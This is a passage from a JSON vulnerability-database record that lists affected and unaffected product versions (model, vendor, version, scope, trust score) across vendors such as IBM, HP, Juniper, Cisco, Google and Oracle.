        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.04"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.10"
      },
      {
        "model": "laserjet p4015 cb509a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.5"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.2"
      },
      {
        "model": "tivoli workload scheduler distributed fp05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "tivoli workload scheduler distributed fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0"
      },
      {
        "model": "data ontap smi-s agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1"
      },
      {
        "model": "endeca information discovery studio",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.1"
      },
      {
        "model": "snapdrive for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.18"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "10.0-rc3-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.3"
      },
      {
        "model": "infosphere master data management provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x1.0.5"
      },
      {
        "model": "laserjet m5035 multifunction printer q7829a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.38"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3200"
      },
      {
        "model": "s2750\u0026s5700\u0026s6700 v100r006",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "8.0-release",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.5.2.3"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.6.1"
      },
      {
        "model": "storevirtual 3tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "laserjet enterprise m602 series ce992a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "fortiwifi",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.8"
      },
      {
        "model": "laserjet enterprise m712 series cf238a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-453"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1.4"
      },
      {
        "model": "junos 12.1r8-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "blackberry enterprise service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x375087220"
      },
      {
        "model": "9.2-release-p7",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "content analysis system software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.5.5"
      },
      {
        "model": "fortimail",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.5"
      },
      {
        "model": "junos 12.1x46-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "sparc enterprise m9000 xcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1117"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.14"
      },
      {
        "model": "advanced settings utility",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.60"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0.0"
      },
      {
        "model": "websphere datapower xml accelerator xa35",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0.7"
      },
      {
        "model": "(comware family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12500v7)0"
      },
      {
        "model": "automation stratix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "rockwell",
        "version": "590015.6.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.11"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.50"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v5000-"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "nexus series fabric extenders",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "20000"
      },
      {
        "model": "intelligencecenter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.2"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "strm 2012.1r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 600gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413012.0"
      },
      {
        "model": "financial services lending and leasing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "14.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.3.2"
      },
      {
        "model": "fortimail build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.8546"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.55"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.5"
      },
      {
        "model": "documentum content server p02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "7.1"
      },
      {
        "model": "player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "9.0.3"
      },
      {
        "model": "sbr global enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "color laserjet printer series q7533a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "300046.80.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.10"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.19"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "power ps700",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "bcaaa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.5"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.7"
      },
      {
        "model": "communicator for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "laserjet enterprise m712 series cf235a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "color laserjet cp5525 ce708a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.12"
      },
      {
        "model": "desktop collaboration experience dx650",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "aura application server sip core pb28",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "oncommand workflow automation",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0"
      },
      {
        "model": "automation stratix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rockwell",
        "version": "59000"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "storevirtual hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433511.5"
      },
      {
        "model": "communicator for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0.2"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.48"
      },
      {
        "model": "telepresence system series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.5.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.63"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.9"
      },
      {
        "model": "secure analytics 2014.2r2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "color laserjet cm4540 mfp cc421a 2302963 436067",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "tivoli workload scheduler for applications fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "clustered data ontap antivirus connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "storevirtual hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.5"
      },
      {
        "model": "color laserjet cp6015 q3934a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.5"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.1.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.6"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "storevirtual vsa software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.24"
      },
      {
        "model": "telepresence ip gateway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ape",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "junos 12.1r10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system en2092 1gb ethernet scalable switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.4.0"
      },
      {
        "model": "p2000 g3 msa array system ts251p005",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "idol software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.8"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.1"
      },
      {
        "model": "smart update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.0"
      },
      {
        "model": "open systems snapvault 3.0.1p6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "key",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "0"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.2"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.14"
      },
      {
        "model": "laserjet p4515 cb515a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "worklight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.0"
      },
      {
        "model": "tivoli netcool/system service monitor fp13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "laserjet enterprise color m775 series cc523a 2302963 436079",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "9.3-beta1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.01"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.11"
      },
      {
        "model": "idp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1"
      },
      {
        "model": "power 780",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "watson explorer security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "power express f/c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "52056340"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "model": "tandberg mxp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7700"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "9.4"
      },
      {
        "model": "junos 12.2r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "u200s and cs family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "security threat response manager 2013.2r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "pulse desktop 5.0r4.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "cloudburst",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413012.0"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.2"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.7"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6.1"
      },
      {
        "model": "winscp",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.5.4"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.04"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.3"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "enterprise session border controller ecz7.3m2p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.02"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6.6"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "laserjet m3035 multifunction printer cc476a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "hsr6800 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.1"
      },
      {
        "model": "management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.3"
      },
      {
        "model": "color laserjet m651 cz258a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "aura session manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "switch series (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v5)0"
      },
      {
        "model": "ddos secure",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.14.1-1"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "3.4.1"
      },
      {
        "model": "9.3-beta1-p2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "60000"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.2"
      },
      {
        "model": "vsm v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "junos 12.2r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "message networking sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "officejet enterprise color mfp b5l05a 2302963 436066",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "x585"
      },
      {
        "model": "color laserjet cm4540 mfp cc420a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "dgs-1210-52",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "4.00.025"
      },
      {
        "model": "ngfw family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "powervu d9190 comditional access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "storevirtual 3tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "integrated management module ii",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.3"
      },
      {
        "model": "msr9xx russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "i v5r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "junos 12.3r4-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.14"
      },
      {
        "model": "ssl vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.0"
      },
      {
        "model": "10.0-release-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.9.3"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1.1"
      },
      {
        "model": "ive os 7.4r11.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system p260",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-23x)0"
      },
      {
        "model": "laserjet enterprise m806 cz244a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "storevirtual china hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.5"
      },
      {
        "model": "softco v200r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "proxyav",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.4.2.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "s2700\u0026s3700 v100r006c05+v100r06h",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "horizon mirage edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.4.2"
      },
      {
        "model": "oceanstor s6800t v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "storevirtual 4tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "virtuozzo containers for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "4.6"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "junos 12.1x44-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb480a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "sbr enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "laserjet enterprise p3015 ce527a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "telepresence mcu series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flex system fabric cn4093 10gb converged scalable switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.4.0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.9.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.8"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.014"
      },
      {
        "model": "asg2000 v100r001c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.154"
      },
      {
        "model": "idp 5.1r4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": null,
        "trust": 0.3,
